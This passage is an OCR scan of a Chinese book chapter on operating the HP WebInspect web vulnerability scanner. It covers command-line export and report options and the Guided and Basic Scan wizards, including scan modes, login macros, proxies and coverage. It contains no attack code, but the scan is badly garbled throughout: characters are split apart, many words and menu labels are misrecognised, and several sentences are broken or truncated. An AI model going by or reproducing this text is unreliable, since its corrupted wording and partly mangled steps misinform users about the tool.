m {filename} 网 络 宏 认证 (路 径 宏 ) 
Ea (filepath 在 完整 XML 格式 的 导出 扫描 
eb {filepath} 在 XML 中 导出 扫描 的 详细 信息 (全 ) 
ec {filepath} f£ XML 中 导出 扫描 的 详细 信息 (评论 ) 
ed (filepath) 在 XML 中 导出 扫描 的 详细 信息 (隐藏 域 ) 
ws ee {filepath} 在 XML 中 导出 扫描 的 详细 信息 (脚本 ) 
ef {filepath) 在 XML 中 导出 扫描 的 详细 信息 (设置 Cookie) 
eg {filepath} 在 XML 中 导出 扫描 的 详细 信息 (Web 窗 体 ) 
eh {filepath) 在 XML 中 导出 扫描 的 详细 信息 (URL) 


第 103€  WebInspect 应 用 实践 。363。 


( 续 表 ) 
类 别 参数 Eg x 
ei (filepath 在 XML 中 导出 扫描 的 详细 信息 (请 求 ) 
ej {filepath} 在 XML 中 导出 扫描 的 详细 信息 (会 话 ) 
ek (filepath) 在 XML 中 导出 扫描 的 详细 信息 (电子 邮件 ) 
el {filepath} 在 XML 中 导出 扫描 的 详细 信息 (参数 ) 
" em (folderpath] 在 XML 中 导出 扫描 的 详细 信息 (网 络 转 储 ) 

en {folderpath} 在 XML 中 导出 扫描 的 详细 信息 (异地 链接 ) 
v 详细 

值 名 称 : 

合计 

警报 视图 
r {name} 攻击 状态 


对 于 多 个 报告 ,用 | 合 规 性 
分 号 分 隔 报告 名 | METRE 
称 。 所 有 报告 都 将 | 执行 摘要 
被 包含 在 一 个 文 | 误 报 
件 中 QA 摘要 
趋势 
漏洞 概要 
漏洞 (遗留 ) 
report type 报告 的 类 型 (“标准 ”或 “ 自 定义 ”) 
f (export path 保存 报告 文件 的 路 径 (完整 路 径 和 文件 名 ) 
gp 导出 为 PDF 
gh 导出 为 HTML 文件 ZIP 文件) 


报告 


导出 为 原始 报告 文件 
gi 导出 为 TIFF 图 像 


Lec 导出 为 富 文本 文件 


Ex 导出 为 文本 


| ge 导出 为 Excel 文件 


t{filepath 使 用 指定 的 合 规 性 模板 文件 


如 果 不 指定 策略 ，WebInspect 将 把 行 (但 不 是 审计 ) 网 站 。 

如 果 指 定 了 一 个 不 存在 的 策略 名 称 ，WebInspect 将 不 进行 扫描 。 
启动 命令 行 的 命令 : 

1) 从 Windows 开始 菜单 中 选择 Run( 运 行 )。 

2) 在 打开 框 中 键入 cmd。 
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3) 单 击 OK( 确 定 )。 

4) 导航 到 安装 WebInspect 的 目录 。 默 认 目 录 为 C:\Program Files HPV HP WebInspect。 

在 对 长 文件 名 进行 妥善 处 理 过 程 中 ， 因 为 它 出 现在 任务 管理 器 ， 是 WLexe。 扫 描 数 据 将 
暂时 缓存 在 工作 目录 中 ， 然 后 移动 到 扫描 目录 。 

仅 当 参数 括 在 双 引号 中 ， 可 使 用 连 字符 的 命令 行 参数 (输出 文件 等 )， 如 下 面 所 示 的 “ 导 
出 路 径 ” 命 令 : 


wi.exe -u http://zero.webappsecurity.com -ea "c:\temp\command-line-test-export. 
xml" 


10.2.24 ik Weblnspect 


EHR, HEERE WebInspect 或 从 计算 机 中 删除 它 。 

如 果 选 择 Remove( 删 除 )， 用 户 可 选择 以 下 一 个 或 两 个 选项 ; 

。 彻底 删除 产品 (Remove product completely): 删除 WebInspect 应 用 程序 和 所 有 相关 文 
件 ， 包 括 扫描 存储 在 本 地 ( 非 共享 )SQL 服务 器 上 的 数据 、 设 置 文件 和 日 志 。 

se， 停 用 许可 证 (Deactivate license): 发 布 WebInspect 许可 证 ， 它 允许 将 WebInspect 安装 
在 不 同 的 计算 机 ， 而 且 应 用 数据 和 文件 不 会 被 删除 。 


10.3 ”扫描 一 个 网 站 


更 新 数据 库 并 准备 扫描 后 ， 用 户 就 可 以 确定 Web 应 用 程序 的 安全 漏洞 。 

按照 下 面 的 步骤 来 开始 扫描 : 

在 WebInspect 菜单 栏 上 ， 单 击 File( 文 件 )， 再 单 击 New( 新 建 )。 或 在 WebInspect 工具 栏 
上 ， 单 击 工具 栏 上 的 新 建 下 拉 箭 头 。 然 后 选择 要 进行 扫描 的 类 型 。 选 项 包括 : 

。 向 导 扫描 (Guided Scan) 

。 基础 扫描 (Basic Scan) 

。 Web 服务 扫描 (Web Service Scan) 

。 企业 扫描 (Enterprise Scan) 


10.3.1 向 导 扫 描 


当 启 动向 导 扫描 时 ， 计 划 显 示 在 左 窗 格 中 ， 当 用 户 指定 设置 扫描 后 ， 用 户 可 以 很 容易 地 
看 到 计划 。 
在 右 窗 格 中 显示 每 个 向 导 页 上 的 扫描 选项 ， 如 下 所 示 : 


TURA: 指定 连接 和 扫描 类 型 :对 指定 网 站 进行 扫描 和 验证 连接 
1) 验证 网 站 (Verify Web Site) 
2) 选择 扫描 类 型 (Choose Scan Type) 
a) 标准 扫描 (Standard Scan). (E StartURL 开始 疏 行 和 /或 审计 网 站 。 
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b) 工作 流 扫描 (Workflows Scan). (EATER EIZ, FAET E TE IESUS 


步骤 2: 登录 - 指定 身份 验证 设置 
1) 验证 网 站 (Verify Web Site) 
a) 网 络 身份 验证 (Network Authentication) 
b) 客户 端 证 书 (Client Certificates) 
2) 应 用 程序 身份 验证 
a) 选择 登录 宏 (Select Login Macro) 
b) 记录 /编辑 登录 宏 (Record/Edit Login Macro) 


步骤 3: 配置 主动 学 习 设置 : 指定 优化 任务 
1) 个 人 网 站 的 最 佳 设 置 (Profile your site for optimal settings) 
2) 增强 覆盖 网 站 (Enhance coverage of your site) 


步骤 4: 查看 设置 
1) 最 终 检阅 (Final Review) 
a) 配置 详细 选项 (Configure Detailed Options) 
b) 验证 设置 和 开始 扫描 (Validate Settings and Start Scan) 


1. 步骤 1: 指定 链接 和 扫描 类 型 


要 启动 向 导 扫描 ， 验 证 连接 ， 并 完成 网 站 设置 : 
1) 在 主页 上 ， 单 击 左 侧 导 航 窗 格 中 的 Start a Guided Scan( 开 始 向 导 扫描 )。 向 导 扫描 指导 
会 在 左 窗 格 中 出 现 选 择 扫描 类 型 页 与 突出 显示 的 参数 。 
2) 在 Start URL 框 中 ， 键 入 或 选择 网 站 完整 URL 2k IP 地 址 进行 扫描 。 
3) 要 限制 一 个 区 域 的 扫描 范围 (可 选 )， 选 择 限制 到 文件 夹 复 选 框 ， 然 后 从 列表 中 选择 以 
下 选项 之 一 : 
* fX H3&(Directory only (self)): WebInspect 将 仅 候 行 和 /或 审计 指定 的 URL。 例 如 ， 如 
果 选 择 了 此 选项 , 并 指定 www.mycompany/one/two/ 的 URL, WebInspect 将 只 评估 “两 
个 ”目录 。 
。 目录 和 子 目 录 (Directory and subdirectories): WebInspect 开始 爬行 和 /或 审计 指定 的 
URL， 但 不 会 访问 较 高 目录 树 中 的 任何 目录 。 
。 目录 和 父 目录 (Directory and parent directories): WebInspect 开始 爬行 和 /或 审计 指定 
的 URL， 但 不 会 访问 较 低 目 录 树 中 的 任何 目录 。 
4) 单 击 Verify( 验 证 )。 
5) 如 果 必 须 通 过 代理 服务 器 访问 目标 网 站 ， 在 主屏 幕 左 下 角 显 示 代理 设置 区 域 ， 单 击 
Proxy( 代 理 ) 服 务 器 。 
当 网 站 或 目录 结构 出 现时 ， 已 成 功 连接 到 Start URL. 
6) 单 击 Next( 下 一 步 )。 在 选择 扫描 类 型 窗口 中 选择 扫描 类 型 。 
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扫描 类 型 
a) 选择 以 下 扫描 类 型 之 一 : 
。 标准 扫描 (Standard Scan); WebInspect 从 目标 URL 开始 进行 自动 分 析 ， 这 是 正常 方 


式 开 始 新 的 扫描 。 
。 工作 流 扫描 (Workflows Scan): 如 果 选 择 此 选项 ,会 出 现 额外 的 工作 流 区 域 ， 显 示 已 
创建 的 工作 流 表 。 


b) 如 果 选 择 Standard Scan( 标 准 扫 描 )， 然 后 键入 或 在 开始 的 URL 框 中 选择 完整 的 URL 
ER IP Heh. 

c) 如 果 选 择 Workflows Scan( 工 作 流 扫描 )， 工 作 流 部 分 会 出 现在 左 窗 格 中 。 

d) 要 完成 工作 流 设置 ， 请 单 击 在 工作 流 表 如 下 的 任意 一 项 : 

。 记录 (Record): 打开 统一 的 Web 宏 录 制 器 ， 允 许 创建 一 个 宏 。 

。 编辑 Edib: 打开 统一 的 Web 宏 录 制 器 ， 加 载 选 定 的 宏 。 

。 删除 Deletej: 删除 选 定 的 宏 ( 但 不 会 从 磁盘 中 删除 )。 

。 导入 (mporb: 打开 一 个 标准 的 文件 选择 窗口 ， 选 择 一 个 以 前 录制 的 宏 。 

。 导出 Exporb: 打开 一 个 标准 的 文件 选择 窗口 ， 允 许 保存 录制 宏 。 在 一 个 宏 被 选中 或 

记录 后 ， 用 户 可 选择 性 地 指定 允许 主机 。 

e) 在 扫描 方法 区 域 ， 选 择 扫描 方式 (包括 仅 息 行 、 爬 行 和 审计 、 仅 审计 )。 

f) 在 策略 区 域 ， 从 策略 列表 中 选择 策略 。 

g) Jf: Next( 下 一 步 )。 此 时 在 左 窗 格 中 将 突出 显示 登录 页 面 与 Network Authentication( 网 
络 身份 验证 )。 

2. 步骤 2: 登录 - 指定 身份 验证 设置 


如 果 网 站 需要 网 络 身份 验证 ， 请 执行 以 下 操作 : 

1) 在 网 络 验证 区 域 中 ， 选 择 一 种 身份 验证 方法 ， 然 后 输入 Client Certificate。 

2) 要 进行 网 络 身份 验证 ， 选 择 使 用 客户 端 证 书 。 

3) 在 证 书 存储 区 中 ， 选 择 下 列 其 中 一 项 ， 然 后 选择 My 或 Root 单 选 按 钮 : 

。 本 地 计算 机 (Local Machine): 在 证 书 存 储 区 域 ，WebInspect 使 用 用 户 选择 的 本 地 计 


算 机 上 的 证 书 。 
。 当前 用 户 (Current User): 在 证 书 存储 区 域 ，WebInspect 对 当前 用 户 使 用 用 户 选择 的 


4) 要 查看 证 书信 息 区 域 的 详细 信息 ， 先 选择 一 个 证 书 。 
5) 单 击 Next( 下 一 步 )， 显 示 应 用 程序 身份 验证 页 面 。 
6) 如 果 网 站 需要 登录 宏 ， 请 执行 以 下 操作 : 
a) 选择 Use a login macro for this site( 为 网 站 使 用 一 个 登录 宏 )。 
b) 在 Automated Login Sequence (Login Macro)( 自 动 登录 序列 (登录 宏 )) 文 本 框 中 ， 如 
果 想 清除 先前 选 定 的 宏 ， 单 击 右 端 文本 框 中 的 义 。 
c) 单 击 Edit( 编 辑 ) 录 制 一 个 新 登录 宏 ， 或 单 击 *… (浏览 ) 按 钮 导航 并 选择 编辑 现 有 
登录 宏 。 
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7) 单 击 Next( 下 一 步 )。 出 现 组 织 任务 页 面 ， 在 左 窗 格 中 的 个 人 网 站 突出 显示 最 佳 设置 。 
3. 步骤 3: 配置 主动 学 习 设置 


1) 探查 
WebInspect 探查 功能 将 对 目标 网 站 进行 初步 探查 ， 以 确定 某 些 设置 是 否 应 该 被 修改 。 如 
果 修 改 是 必需 的 ， 探 查 将 返回 一 个 建议 列表 ， 用 户 可 以 接受 或 拒绝 该 建议 。 
2) 设置 
a) 接受 或 拒绝 该 建议 。 如 果 要 拒绝 ， 清 除 相 关 的 复 选 框 。 
b) 如 有 必要 ， 提 供 所 需 的 信息 。 
c) 单 击 Next( 下 一 步 )。 
3) 信息 
如 果 探 查 不 建议 修改 ， 扫 描 向 导 将 显示 消息 “没有 设置 更 改建 议 ， 您 目前 的 扫描 设置 最 
适合 这 个 网 站 。” 网 站 任务 的 增强 覆盖 突出 显示 在 左 窗 格 中 。 
4) 增强 覆盖 网 站 
为 增强 覆盖 应 用 程序 ， 浏 览 到 应 用 程序 中 的 关键 位 置 来 提高 覆盖 率 。 
5) Web 表单 值 
向 导 扫 描记 录 所 有 用 户 输入 网 页 表单 的 值 ， 在 这 里 用 户 可 以 查看 和 修改 值 ， 这 是 被 保存 
在 扫描 设置 的 一 部 分 。 在 工具 栏 中 的 Web 窗 体 部 分 ， 可 单 击 Export( 导 出 ) 将 值 保存 到 一 个 单 
独 的 文件 ， 或 者 单 击 Import( 导 入 ) 使 用 现 有 的 值 集 。 扫 描 设置 (包括 Web 表单 的 值 ) 可 以 使 用 
默认 值 ， 用 户 可 在 将 来 的 扫描 中 修改 。 
单 击 Next( 下 一 步 )。 
最 终审 查 页 面 和 突出 显示 的 配置 详细 选项 将 显示 在 左 窗 格 中 。 
4. 步骤 4: 查看 设置 


要 配置 详细 选项 ， 指 定 以 下 任 一 设置 : 
1) 重用 识别 误 报 
选择 False Positives( 误 报 ) 框 ， 重 用 WebInspect 已 确定 的 误 报 。 
2) 流量 分 析 
a) 使 用 Web 代理 工具 ， 选 择 Launch and Direct Traffic( 启 动 和 直接 流量 )， 通 过 Web 
代理 服务 器 来 使 用 Web 代理 工具 , 来 检查 通过 WebInspect 发 出 的 HTTP 请 求 和 目 
标 服务 器 返回 的 响应 。 
b) Web 代理 是 一 个 独立 的 代理 服务 器 ， 用 户 可 在 桌面 上 配置 和 运行 。Web 代理 允许 
通过 扫描 仪 、Web 浏览 器 或 提交 的 HTTP 请 求 和 从 服务 器 接收 响应 的 任何 其 他 工 
具 监 控 流量 。Web 代理 是 用 于 调试 和 渗透 扫描 的 工具 ， 当 浏览 一 个 网 站 时 ， 用 户 
可 以 查看 每 个 请 求 和 服务 器 响应 。 
c) 选择 Traffic Monitor( 流 量 监视 器 ) 框 来 显示 和 审查 WebInspect 从 服务 器 接收 到 的 相 
关 HTTP 响应 发 送 的 每 个 HTTP 请 求 。 
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d) 在 扫描 一 个 网 站 时 ，WebInspect 只 显示 网 站 层次 结构 以 及 发 现 漏洞 的 那些 会 话 。 
但 如 果 选 择 Enable Traffic Monitor( 启 用 流量 监视 器 )，WebInspect 允许 显示 和 审查 
WebInspect 从 服务 器 接收 到 的 相关 HITP 响应 发 送 的 每 个 HITP 请 求 。 

e) 单 击 Next( 下 一 步 )。 出 现 验证 设置 和 开始 扫描 页 面 ， 在 左 窗 格 中 突出 显示 配置 详 
细 选 项 。 

f) 要 保存 扫描 设置 ， 选 择 Click here to save settings( 单 击 此 处 保存 设置 )。 

g) 在 立即 扫描 区 域 ， 检 查 扫 描 设置 ， 然 后 单 击 Start Scan( 开 始 扫描 ) 开 始 扫描 。 


5. 导入 HP 统一 功能 测试 (UFT) 文 件 


如 果 已 安装 HP 统一 功能 测试 应 用 程序 ，WebInspect 可 以 检测 到 它 ， 并 允许 用 户 将 一 个 
UTF 文件 CusD 导 入 到 工作 流 扫描 ， 以 提高 扫描 的 彻底 性 和 攻击 面 。 

导入 一 个 UTF(.usr) 文 件 转换 成 WebInspect 向 导 扫描 : 

1) 启动 一 个 向 导 扫描 ， 然 后 选择 Workflow Scan( 工 作 流 扫 描 ) 作 为 扫描 类 型 。 工 作 流 扫 
描 选 项 的 附加 文本 会 出 现 : 

HP 统一 功能 测试 已 被 侦破 。 可 导入 脚本 来 提高 安全 测试 的 彻底 性 。 

2) 单 击 Next( 下 一 步 ) 按 钮 。 

3) 在 认证 部 分 ，Application Authentication( 应 用 程序 身份 验证 ) 被 自动 选择 。 

4) 在 管理 工作 流 屏幕 上 , 单 击 Import( 导 入 )。 出现 导入 脚本 对 话 框 。 在 导入 脚本 对 话 框 ， 


可 以 : 
. 


键入 文件 名 。 

通过 单 击 一 个 澡 找 到 用 户 的 文件 和 .urs 扩展 来 浏览 文件 。 从 下 拉 文 件 类 型 选择 HP 
Unified Functional Testing(HP 统一 功能 测试 )， 然 后 导航 到 该 文件 。 

单 击 编辑 以 启动 HP 统一 功能 来 测试 应 用 程序 。 


5) (可 选 ) 在 导入 脚本 对 话 框 ， 可 以 选择 以 下 任 一 选项 : 


在 导入 期 间 显示 HP 统一 功能 测试 UI(Show HP Unified Functional Testing UI during 
import) 
导入 后 打开 脚本 结果 (Open script result after import) 


6) 选择 要 导入 的 文件 ， 然 后 单 击 Import( 导 入 )。 在 文件 被 成 功 导 入 后 ， 该 文件 会 出 现在 
工作 流 表 中 。 
7) 从 工作 流 表 执 行 下 列 操 作 之 一 : 


记录 (Record): 启动 WebInspect 统一 宏 录 制 。 

编辑 Edib: 允许 使 用 WebInspect 统一 的 Web 宏 记 录 修 改 文件 。 

删除 (Delete): 从 工作 流 表 中 删除 脚本 。 

导入 Gmporb: 导入 另 一 个 文件 。 

导出 Exporb: 用 webmacro 格式 指定 名 称 和 位 置 ， 并 保存 为 一 个 文件 。 


8) 单 击 Next( 下 一 步 )。 
当 第 一 个 .usr 脚本 文件 添加 到 列表 中 , 其 名 称 (或 默认 名 称 ) 会 出 现在 工作 流程 表 并 允许 主 
机 表 被 添加 到 窗 格 中 。 
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添加 另 一 个 usr 脚本 文件 可 以 添加 更 多 的 允许 主机 。 已 启用 的 任意 主机 对 所 有 列 出 的 工 
作 流 的 .usr 脚本 文件 可 用 。 不 只 是 为 它 加 入 了 工作 流 的 -usr 文件 。 向 导 扫描 将 列 出 所 有 工作 流 
文件 ， 并 要 求 列 出 所 有 的 允许 主机 ， 以 及 其 复 选 框 是 否 被 选中 。 如 果 选 择 了 一 个 允许 主机 的 
复 选 框 ，WebInspect 将 息 行 或 审计 该 主机 的 响应 。 如 果 复 选 框 未 选中 ，WebInspect 4^ etr 
或 审计 该 主机 的 响应 。 

此 外 ， 如 果 一 个 特定 的 工作 流 .usr 脚本 使 用 参数 ， 当 在 列表 中 选择 工作 流 ， 宏 会 显示 一 
个 宏 参数 表 。 根 据 需 要 编辑 参数 的 值 。 

9) 完成 变更 或 增加 工作 流 表 ， 在 向 导 扫 描 的 指导 下 继续 完成 设置 并 运行 扫描 。 
10.3.2 ”基础 扫描 

当 启 动 一 个 基础 扫描 时 ， 会 出 现 扫描 向 导 窗口 。 

随后 窗口 中 默认 显示 的 选项 都 是 WebInspect 的 默认 设置 。 用 户 所 做 的 任何 更 改 都 将 只 用 
于 此 扫描 。 如 果 在 窗口 底部 单 击 Settings(Default)( 设 置 (默认 )) 访 问 WebInspect 设置 窗口 ， 用 
户 的 任何 操作 都 是 暂时 性 更 改 。 要 更 改 默 认 设置 ， 必 须 从 Edit( 编 辑 ) 菜 单 中 选择 Default Scan 
Settings( 默 认 扫 描 设置 )。 

页 面具 体内 容 如 图 10-45 所 示 。 


iv i CCC 


| Web Site Scan Stepiofs , | 
Perform a scan of the target application. | 


Scan Name: Site: http://zero.webappsecurity.com/ 


Crawl Only 9 Crawl & Audit © Audit Only © Manual 


® Standard Scan 
Webinspect performs an automated analysis starting from the target URL. 


Start URL: http://zero.webappsecurity.com/ i 
[E Restrict to folder: 
^ List-Driven Scan 
Perform a scan using a list of URLs. These URLs can be listed in a text file or an XML file created by the harvest tool. 
File: | 
© MWorkflow-Driven Scan 
Use a macro to navigate the application and perform an automated analysis. | 


Macro: | . 


Next > Cancel 


图 10-45 Scan Wizard( 扫 描 向 导 ) 窗 口 


扫描 名 称 (Scan Name): 给 本 次 扫描 设置 一 个 名 称 。 
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选择 扫描 模式 ， 包 括 以 下 四 种 : 

fUR&fT(Craw Only): 测试 比较 大 型 的 网 站 ， 建 议 先 聆 行 ， 再 对 内 容 审计 。 

IRATA P (Crawl & Audit): 此 选项 为 默认 选项 ， 该 选项 会 以 最 快 的 速度 完成 候 行 和 审 
计 。 测 试 小 规模 的 网 站 时 ， 建 议 使 用 此 选项 。 

仅 审计 (Audit Only): 对 扫描 的 结果 进行 审计 。 

手动 (Manual): 类 似 于 被 动 检测 ，WebInspect 会 模拟 一 个 浏览 器 , 然后 根据 用 户 的 操作 ， 
自动 扫描 和 审计 用 户 访问 的 内 容 ， 所 有 操作 都 必须 在 WebInspect 模拟 出 来 的 浏览 器 上 进行 。 

选择 扫描 类 型 ， 包 括 以 下 三 种 : 

标准 扫描 (Standard Scan): 用 户 需 要 提供 待 扫描 网 站 的 地 址 。 勾 选 Restrict to folder( 限 制 
到 文件 夹 ) 复 选项 可 以 限制 扫描 的 深度 ， 如 只 扫描 目录 、 扫描 目录 及 其 子 目 录 、 扫 描 目录 及 其 
父 目 录 。 

列表 驱动 扫描 (ListDriven Scan): 用 户 需 要 提供 一 个 待 扫描 URL 的 列表 , 文件 格式 为 .txt 
或 者 xml。WebInspect 根据 列表 内 容 扫描 和 审计 。 

工作 流 驱动 扫描 (Workflow-Driven Scan): 录制 一 个 工作 流 的 宏 ，WebInspect 根据 工作 
流 的 操作 ， 自 动 扫描 和 审计 访问 的 内 容 。 


任务 1: 选择 扫描 选项 
1) 在 Scan Name( 扫 描 名 称 ) 文 本 框 中 ， 输 入 一 个 名 称 或 扫描 的 简要 说 明 。 
2) 要 载 入 之 前 保存 的 设置 (可 选 ): 
a) 单 击 Settings( 设 置 ) 按 钮 的 下 拉 箭 头 。 
b) 执行 以 下 操作 之 一 : 
选择 From File( 来 自 文件 )， 打 开标 准 的 文件 选择 窗口 ， 然 后 选择 一 个 文件 ， 然 后 单 击 
Open( 打 开 )。 
从 下 拉 列 表 中 选择 一 个 文件 。 
3) 选择 以 下 扫描 模式 之 一 : 
© [J&fT(Crawl Only): 此 选项 会 完全 映射 一 个 网 站 的 分 层 数据 结构 。 当 息 行 已 经 完成 ， 
可 以 单 击 审计 ， 以 评估 应 用 程序 的 漏洞 。 
。 IET Rit (Crawl and Audit): WebInspect 映射 网 站 的 分 层 数据 结构 和 审计 每 个 资源 
(页 )。 根据 选择 的 默认 设置 ， 每 个 资源 被 代行 或 在 整个 网 站 被 代行 后 ， 审 计 就 可 以 进 
行 漏洞 评估 。 
* 仅 审 计 (Audit Only): WebInspect 应 用 于 选 定 策略 来 确定 漏洞 风险 的 方法 ， 但 不 疏 行 
网 站 。 网 站 上 无 链接 遵循 或 评估 。 
。 手动 (Manual): 手动 模式 可 手动 导航 到 选择 访问 的 应 用 程序 的 任何 部 分 。 它 不 会 拒 
行 整个 网 站 ， 仅 记录 那些 遇 到 的 手动 导航 网 站 的 资源 信息 。 此 功能 是 最 常用 的 ， 通 
过 一 个 Web 表单 登录 页 面 进入 网 站 或 定义 一 个 离散 子 集 。 一 旦 通过 网 站 完成 导航 ， 
户 可 评估 审计 结果 来 记录 网 站 的 安全 漏洞 。 
4) 选择 以 下 扫描 类 型 之 一 : 
。 标准 扫描 (Standard Scan): WebInspect 从 目标 URL 开始 进行 自动 分 析 。 这 是 开始 
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个 新 扫描 的 最 常用 方式 。 

* 手动 扫描 (Manual Scan): 手动 候 行 ( 步 模 式 ) 可 手动 导航 到 选择 访问 的 应 用 程序 的 任 
何 部 分 。 此 选项 仅 当选 择 手动 扫描 模式 时 可 用 。 

。 列表 驱动 的 扫描 (List-Driven Scan): 使 用 由 扫描 列表 执行 的 URL 扫描 。 每 个 URL 
必须 是 完全 限定 的 ， 并 且 必 须 包 括 协 议 (例如 ，http:// 或 https:/)。 可 使 用 一 个 文本 文 
件 (格式 为 逗号 分 隔 列 表 ， 或 每 行 一 个 网 址 )， 或 使 用 由 Files To URLs 实用 程序 生成 
的 XML 文件 。 

。 工作 流 驱 动 扫 描 (Workflow-Driven Scan): WebInspect 只 审计 包括 在 先前 记录 宏 中 和 
并 没有 在 审计 过 程 中 遇 到 的 超 链 接 URL， 不 需要 注销 签名 。 使 用 这 种 类 型 的 宏 通 常 
专注 于 一 个 特定 应 用 程序 的 一 部 分 。 用 户 可 以 选择 多 个 宏 。 

5) 如 果 选 择 Standard Scan( 标 准 扫描 )， 请 按 以 下 说 明 操作 : 

a) 在 Start URL 框 中 ， 键 入 或 选择 要 检查 网 站 的 完整 URL ER IP 地 址 。 

b) 如 果 选 择 Restrict to folder( 对 文件 夹 限制 )， 可 以 限制 扫描 的 范围 ， 从 下 拉 列 表 中 选择 

区 域 。 选 项 包括 : 

* [X B3&(Directory only): WebInspect 仅 将 息 行 和 /或 审计 用 户 指定 的 URL。 例 如 ， 如 
果 选 择 了 此 选项 ， 并 指定 URL Jy www.mycompany/one/two/, Weblnspect 将 仅 评估 
two 目录 。 

。 目录 和 子 目录 (Directory and subdirectories): WebInspect 开始 爬行 和 /或 审计 指定 的 
URL， 但 不 会 访问 目录 树 中 任何 较 高 的 目录 。 

。 目录 和 父 目 录 (Directory and parent directories); WebInspect 开始 爬行 和 /或 审计 指定 
的 URL， 但 不 会 访问 目录 树 中 任何 较 低 的 目录 。 

6) 如 果 选 择 Manual Scan( 手 动 扫 描 )， 输 入 URL， 如 有 必要 ， 可 选择 Restrict to folder( 限 

制 到 文件 夹 )。 参 见 标准 扫描 。 

7) 如 果 选 择 List-Driven Scan( 列 表 驱 动 的 扫描 )， 请 执行 下 列 操作 之 一 : 

* 单 击 Import( 导 入 )， 然 后 选择 一 个 文本 文件 或 包含 要 扫描 URL 列表 的 XML 文件 。 

e 单 击 Manage( 管 理 ) 创 建 或 修改 URL 列表 。 

注意 : 此 功能 也 与 FilesToURLs 功能 结合 使 用 。 

8) 如 果 选 择 Workflow-Driven Scan( 工 作 流 驱 动 的 扫描 )， 请 执行 下 列 操作 之 一 : 

。 单 击 Manage( 管 理 )， 选 择 、 编 辑 、 录 制 、 导 入 、 导 出 或 删除 一 个 宏 。 

o 单 击 Record( 记 录 ) 并 创建 宏 。 

在 一 个 扫描 中 可 以 包括 多 个 宏 。 

9) 单 击 Next( 下 一 步 )。 


任务 2: 提供 身份 验证 和 连接 信息 
页 面具 体内 容 介绍 如 图 10-46 所 示 。 
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Ei sn Word do Sm m m Bod 
Authentication and Connectivity Step 2 of 5 
Provide the necessary credentials and environment information to gain access to the target web site. 


F Network Proxy 


Proxy Profile: [Use Internet Explorer m) (Editan) 


E Network Authentication 


Method 
User Name: 
] Site Authentication 


protected locations of your application. Therefore, using a login macro is highly recommended to 


Settings (Default) + 


[ <Back | Next» || Cancel | 


图 10-46 身份 验证 和 连接 信息 


y 


0 果 提 供 的 URL 不 在 许可 证 的 范围 内 ，WebInspect 会 报错 。 
网 络 代理 (Network Proxy): 默认 使 用 IE 的 网 络 代理 ， 也 可 以 修改 为 其 他 代理 。 
网 络 身份 验证 (Network Authentication): 若 网 站 的 认证 只 是 简单 认证 (如 Windows iA iE), 
选择 该 选项 即 可 。 
网 站 身份 验证 (Site Authentication): 如 果 网 站 需要 认证 ， 在 这 里 选 之 前 录制 的 登录 宏 ， 
利用 宏 来 进行 登录 。 
1) 如 果 需 要 通过 代理 服务 器 访问 目标 网 站 , 选择 Network Proxy( 网 络 代理 ), 然后 从 Proxy 
Profile( 代 理 配 置 ) 文 件 列表 中 选择 选项 : 
自动 检测 (Autodetecb: 使 用 WPAD 来 定位 一 个 代理 自动 配置 文件 ， 并 用 它 来 配置 浏览 
器 的 Web 代理 服务 器 。 
o 使 用 Internet Explorer(Use Internet Explorer): 从 正 导入 代理 服务 器 信息 。 
。 使 用 PAC 文件 (Use PAC File): 从 PAC 文件 加 载 代 理 设置 。 如 果 选 择 此 选项 ， 单 击 
Edit( 编 辑 )， 然 后 进入 PAC 的 位 置 (URI)。 
。 使 用 显 式 代理 设置 (Use Explicit Proxy Settings): 指定 代理 服务 器 设置 。 如 果 选 择 此 
选项 ， 单 击 Edit( 编 辑 )， 然 后 进入 代理 信息 。 
* 使 用 Mozilla Firefox 浏览 器 (Use Mozilla Firefox): 从 Firefox 导入 代理 服务 器 信息 。 
选择 使 用 浏览 器 的 代理 设置 并 不 能 保证 通过 代理 服务 器 访问 网 络 。 如 果 Firefox 浏览 器 
的 连接 设置 配置 为 “无 代理 ”， 或 者 不 选中 Internet Explorer 设置 “使 用 代理 服务 器 为 LAN”， 
将 不 会 使 用 代理 服务 器 。 
2) 选择 Site Authentication( 网 站 身份 验证 )， 如 果 需 要 服务 器 身份 验证 。 那 么 选择 一 种 身 
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份 验证 方法 ， 输 入 用 户 的 网 络 凭据 。 

3) 选择 网 站 验证 使 用 包含 用 户 名 和 密码 的 录制 宏 , 让 用 户 登录 到 目标 网 站 。 该 宏 还 必须 
包含 一 个 “退出 条 件 ”%” 这 表明 当 一 个 意外 退出 发 生 时 ，WebInspect 可 以 重新 运行 该 宏 再 
次 登录 。 

。 单 击 [9 选择 一 个 宏 。 如 果 选 择 一 个 宏 后 , 希望 使 用 Web 宏 记录 修改 宏 , 单 击 Edit 

辑 )。 
erai 9Recod.] 创 建 一 个 宏 。 
4) 单 击 Next( 下 一 步 )。 


任务 3: 指定 覆盖 范围 和 彻底 性 

页 面具 体内 容 介绍 如 图 10-47 所 示 : 

HER Framework): 如 果 系 统 构建 在 一 些 常用 框架 之 上 ，HP WebInspect 可 以 针对 这 些 框 
架 或 者 组 件 进行 扫描 优化 ， 但 仍 需 提供 登录 宏 等 必 备 组 件 ， 目 前 只 支持 Oracle ADF Faces. 
Oracle ADF Faces 包含 100 多 个 JSF 组 件 ， 用 户 可 以 使 用 它们 为 Java EE 应 用 程序 构建 更 丰 
富 的 用 户 界面 。Oracle ADF Faces 还 包含 当今 JSF 开发 人 员 最 需要 的 许多 框架 特性 。 

扫描 范围 (Crawl Coverage): 默认 为 最 高 级 别 ， 级 别 越 高 ， 扫 描 范 围 越 广 ， 速 度 越 慢 ; 
级 别 越 低 ， 扫 描 范围 越 小 ， 速 度 越 快 。 这 里 需要 平衡 扫描 范围 和 扫描 时 间 。 

校 验 策略 (Audit Depth): 选择 一 个 检验 策略 ， 我 们 常用 的 策略 是 OWASP Top 10 2010. 

WebInspect 会 自动 进行 测评 ， 优 化 之 后 的 扫描 ， 以 便 更 快 更 好 地 执行 操作 。 

1) 为 对 一 个 应 用 程序 进行 优化 设置 ， 使 用 Oracle 应 用 开发 框架 Faces 组 件 或 BM 
WebSphere Portal, Xf% Framework( 框 架 )， 然 后 从 Optimize scan for( 优 化 扫描 ) 列 表 中 选择 
Oracle ADF Faces 或 WebSphere Portal。 惠 普 可 能 开 mE 并 使 其 智能 更 新 。 


LN ee Danae — — HN E 
Coverage and Thoroughness Step 3f 5 
Configure your scan tc balance between efficency and thoroughness as well as optimize your configuration for select frameworks. 

El Eramework 


Crawl Coverage 
7 Default 


